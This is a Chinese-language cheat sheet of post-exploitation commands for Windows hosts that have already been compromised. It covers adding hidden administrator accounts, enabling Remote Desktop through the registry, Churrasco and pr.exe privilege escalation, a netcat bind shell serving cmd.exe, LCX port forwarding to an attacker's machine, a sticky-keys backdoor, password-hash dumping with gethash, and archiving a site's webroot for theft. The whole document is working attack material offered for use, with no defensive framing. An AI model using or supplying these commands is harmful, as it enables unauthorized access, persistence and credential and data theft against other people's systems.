关于cmdshell提权的一些命令

CMD部分提权常用命令 ipconfig         显示本地IP地址 net start telnet           开telnet服务 net use z:127.0.0.1c$　　　　　映射对方的C盘  net user　　　　　　　　　　　　查看所有用户列表 net user xiaoma xiaoma /add           添加用户xiaoma密码为xiaoma net localgroup administrators xiaoma /add   将帐号xiaoma升级为管理员  attrib    隐藏文件 开3389 REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 查终端端口 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp    ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ 巴西烤肉   Churrasco.exe "命令" 使用方法： C:\RECYCLER\Churrasco.exe "net user xiaoma xiaoma /add && net localgroup administrators xiaoma /add" C:\RECYCLER\Churrasco.exe "net user admin$ /del"  删除帐号 query user  查看会话 logoff ID号  踢掉 C:\RECYCLER\Churrasco.exe "logoff 1"   ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ NC反弹 路径\nc.exe -l -p 端口 -t -e 路径\cmd.exe c:\RECYCLER\nc.exe -l -p 1234 -t -e c:\RECYCLER\cmd.exe NC上传 DOS界面下运行: NC -vv www.baidu.com 80<1.txt -vv: 回显 80: www端口 1.txt: 就是你要发送的数据包 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ LCX端口转发 先本地监听51端口 lcx.exe -listen 51 3389 c:\recycler\lcx.exe -slave 自己的ip 51 肉鸡IP 3389    LCX转发 c:\recycler\lcx.exe -slave 222.222.222.222 51 111.111.111.111 3389 ■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■ 360提权 1.开启终端服务，端口为3389；用法：360.exe “port” 2.替换5下shift为cmd；用法：360.exe “sethc” ==================================================================== gethash使用 C:\RECYCLER\gethash.exe $local ========================================================================= pr提权 c:\recycler\cmd.exe c:\recycler\pr.exe pr.exe "net user xiaoma xiaoma /add & net localgroup administrators xiaoma /add" ================================================================================ rar.exe打包命令 cmd.exe /c "\Program Files\winrar\rar.exe" a -r d:\wwwroot\1.rar d:\wwwroot